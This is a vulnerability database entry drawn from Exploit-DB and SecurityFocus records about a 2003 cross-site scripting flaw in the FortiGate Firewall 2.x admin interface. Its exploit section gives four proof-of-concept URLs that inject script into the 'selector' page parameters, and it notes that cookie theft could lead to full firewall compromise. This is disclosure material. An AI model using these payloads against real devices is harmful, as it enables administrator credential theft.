Details of VAR-E-200311-0029

ID

VAR-E-200311-0029

EDB ID

23379

TITLE

Fortigate Firewall 2.x - selector Admin Interface Cross-Site Scripting - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 23379

DESCRIPTION

Fortigate Firewall 2.x - selector Admin Interface Cross-Site Scripting. CVE-3296 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 23379

AFFECTED PRODUCTS

vendor:	fortigate	model:	firewall	scope:	eq	version:	2.x	Trust: 1.0
vendor:	fortinet	model:	fortios	scope:	eq	version:	2.50	Trust: 0.3
vendor:	fortinet	model:	fortios	scope:	eq	version:	2.36	Trust: 0.3
vendor:	fortinet	model:	fortios 0mr4	scope:	eq	version:	2.5	Trust: 0.3
vendor:	fortinet	model:	fortios mr5	scope:	ne	version:	2.50	Trust: 0.3

sources: BID: 9033 // EXPLOIT-DB: 23379

EXPLOIT

source: https://www.securityfocus.com/bid/9033/info

Multiple cross-site scripting vulnerabilities have been reported in the FortiGate Firewall web administrative interface.

These issues could be exploited by enticing an administrative user to follow a malicious link that includes hostile HTML and script code as values for URI parameters. If such a link is followed, the hostile code may be rendered in the administrator's browser. This could lead to theft of cookie-based authentication credentials, which contain the username and MD5 hash of the password, allowing for full compromise of the firewall.

http://www.example.com/theme1/selector?button=status,monitor,session"><script>alert('oops')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session

http://www.example.com/theme1/selector?button=status,monitor,session&button_url=/system/status/status"><script>alert('oops')</script>,/system/status/moniter,/system/status/session

http://www.example.com/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter"><script>alert('oops')</script>,/system/status/session

http://www.example.com/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session"><script>alert('oops')</script>

Trust: 1.0

sources: EXPLOIT-DB: 23379

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 23379

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 23379

TYPE

selector Admin Interface Cross-Site Scripting

Trust: 1.0

sources: EXPLOIT-DB: 23379

CREDITS

Maarten Hartsuijker

Trust: 0.6

sources: EXPLOIT-DB: 23379

EXTERNAL IDS

db:	BID	id:	9033	Trust: 1.9
db:	EXPLOIT-DB	id:	23379	Trust: 1.6
db:	EDBNET	id:	45524	Trust: 0.6

sources: BID: 9033 // EXPLOIT-DB: 23379 // EDBNET: 45524

REFERENCES

url:	https://www.securityfocus.com/bid/9033/info	Trust: 1.0
url:	https://www.exploit-db.com/exploits/23379/	Trust: 0.6
url:	http://www.fortinet.com/	Trust: 0.3

sources: BID: 9033 // EXPLOIT-DB: 23379 // EDBNET: 45524

SOURCES

db:	BID	id:	9033
db:	EXPLOIT-DB	id:	23379
db:	EDBNET	id:	45524

LAST UPDATE DATE

2022-07-27T09:17:49.742000+00:00

SOURCES UPDATE DATE

db:

BID

id:

9033

date:

2003-11-12T00:00:00

SOURCES RELEASE DATE

db:	BID	id:	9033	date:	2003-11-12T00:00:00
db:	EXPLOIT-DB	id:	23379	date:	2003-11-12T00:00:00
db:	EDBNET	id:	45524	date:	2003-11-12T00:00:00